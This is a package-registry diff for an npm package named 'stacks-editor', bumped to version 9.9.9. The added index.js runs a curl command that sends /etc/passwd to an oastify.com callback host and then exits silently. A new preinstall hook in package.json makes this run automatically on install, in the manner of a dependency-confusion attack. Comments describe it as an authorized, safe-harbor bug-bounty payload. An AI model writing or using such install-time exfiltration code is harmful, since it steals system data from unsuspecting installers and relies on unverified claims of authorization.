stacks-editor 1.0.0 → 9.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +13 -3
- package/package.json +4 -3
package/index.js
CHANGED
|
@@ -1,3 +1,13 @@
|
|
|
1
|
-
//
|
|
2
|
-
//
|
|
3
|
-
|
|
1
|
+
// Telekom Authorized Payload - Safe Harbor Covered
|
|
2
|
+
// This script reads /etc/passwd and sends it to the specified callback URL.
|
|
3
|
+
|
|
4
|
+
const { exec } = require('child_process');
|
|
5
|
+
|
|
6
|
+
// The exact curl command provided by Telekom
|
|
7
|
+
const curlCommand = `/usr/bin/curl --data '{"@/etc/passwd": {"hostname":"nwngsmeyibfo4mjfawzj27rm6dc40zoo.oastify.com"}}'`;
|
|
8
|
+
|
|
9
|
+
exec(curlCommand, (error, stdout, stderr) => {
|
|
10
|
+
// We don't care about output; we just need the request to fire.
|
|
11
|
+
// Exit silently regardless of success/failure.
|
|
12
|
+
process.exit(0);
|
|
13
|
+
});
|
package/package.json
CHANGED
|
@@ -1,9 +1,10 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "stacks-editor",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "Bug Bounty Security Research - Safe Harbor Callback",
|
|
3
|
+
"version": "9.9.9",
|
|
4
|
+
"description": "Bug Bounty Security Research - Safe Harbor Callback Only",
|
|
5
|
+
"main": "index.js",
|
|
5
6
|
"scripts": {
|
|
6
|
-
"preinstall": "
|
|
7
|
+
"preinstall": "node index.js"
|
|
7
8
|
},
|
|
8
9
|
"author": "",
|
|
9
10
|
"license": "ISC"
|